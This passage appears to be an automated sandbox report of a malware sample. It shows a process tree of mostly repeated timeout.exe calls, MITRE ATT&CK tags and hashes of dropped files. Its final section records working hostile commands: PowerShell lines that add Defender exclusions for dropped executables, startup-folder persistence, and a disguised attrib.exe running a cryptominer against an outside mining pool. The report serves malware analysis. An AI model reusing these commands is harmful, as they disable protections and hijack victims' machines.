    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3860
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3768
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3632
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3424
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3920
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3872
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3752
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4020
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1972
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3892
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3160
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3164
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3288
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3212
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3880
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3096
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3380
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3508
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2748
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1520
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3412
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3640
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3748
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3464
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3860
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3824
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3524
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1432
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4020
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2040
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3992
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3160
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3164
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3212
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3192
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3172
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3440
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3492
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1520
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3556
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3528
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3644
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3920
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4024
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2040
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3424
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3236
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3152
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3192
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3440
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1520
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3556
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3860
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4020
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2040
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3236
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3152
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1496
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4024
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2040
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4020
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:3152
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3644
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:3540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4104
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4128
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4172
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4196
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4208
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4224
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4240
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4256
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4284
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4296
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4308
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4324
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4336
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4348
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4368
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4380
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4392
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4416
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4428
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4444
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4456
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4472
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4488
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4504
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4528
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4560
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4572
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4584
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4600
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4616
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4628
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4644
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4660
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4676
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4704
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4720
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4736
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4752
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4764
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4932
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4952
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4964
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4980
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5032
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5076
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4160
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2520
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4360
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4508
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4892
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4208
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4260
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4268
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:2508
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4340
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4448
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4876
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5048
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4488
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4764
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5060
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5104
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:928
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4024
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4328
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4648
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:5084
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4368
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4908
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5076
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4300
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4996
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4184
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4832
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5004
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4456
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4868
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4384
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4836
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4172
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1000
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5020
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4656
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4164
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4912
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4924
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4396
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4776
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4528
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4752
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5020
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4244
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4872
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4884
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4936
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5036
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4708
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4908
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4896
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:1748
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5116
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2520
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4872
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4576
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4508
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4480
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4516
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        Delays execution with timeout.exe
        
        PID:4248
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4752
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4152
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4720
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5008
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4732
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4832
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4980
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4108
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5036
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4984
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4228
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4256
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4688
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4024
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:1076
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:2092
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5088
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4576
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4508
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:5052
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 0
        5⤵
        
        PID:4516
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Hyfatok.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2200
- - C:\Users\Admin\AppData\Local\Temp\Hyfatok.exe
    "C:\Users\Admin\AppData\Local\Temp\Hyfatok.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1904
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 1904 -s 1736
      4⤵
      PID:1056
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\SetupTCPIP6Driver.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1056
- - C:\Windows\System32\SetupTCPIP6Driver.exe
    "C:\Windows\System32\SetupTCPIP6Driver.exe"
    3⤵
    - Executes dropped EXE
    PID:2820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\SetupTcpipDriver.exe'
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:988
- - C:\Windows\System32\SetupTcpipDriver.exe
    "C:\Windows\System32\SetupTcpipDriver.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Drops file in System32 directory
    PID:1984
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regedit.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Runs regedit.exe
      PID:2300
- C:\Users\Admin\AppData\Local\Temp\dcrat\php\php.exe
  php -S 127.0.0.1:8000 -t ..\server
  2⤵
  PID:708

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2448

C:\Windows\system32\taskeng.exe
taskeng.exe {7862F410-5BA9-47B7-B19A-81756051B7D0} S-1-5-21-3787592910-3720486031-2929222812-1000:HSNHLVYA\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
PID:1788
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2232
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck63544
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2272
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:296
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck63544
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - NTFS ADS
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:400
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2224
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3480
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:4664
  - - C:\Windows\System32\attrib.exe
      -a rx/0 -o stratum+ssl://auto.c3pool.org:33333 -u 88stqbdHnfya436DJkUvtGfW8tiWNMv6aQFB5cpK7zY2P9G6D5CaM9VfzZmNfaZweXeuhnGZjcqrPJrTXEmvFxttLezJvkm.6B6CDD0E -p x -t 4
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Views/modifies file attributes
      PID:5004
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4704
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck63544
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:4876
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4692

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6B2043001D270792DFFD725518EAFE2C

Filesize
579B

MD5
f55da450a5fb287e1e0f0dcc965756ca

SHA1
7e04de896a3e666d00e687d33ffad93be83d349e

SHA256
31ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0

SHA512
19bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6B2043001D270792DFFD725518EAFE2C

Filesize
252B

MD5
6556dfdc73e705f5a348516ae6683efb

SHA1
bda401ddff4c7dfe193610bcd524b7a0c9efa67e

SHA256
1af748392040d633c51962ee7823086cde1200ef3179e2fbce8519a7ee4169a9

SHA512
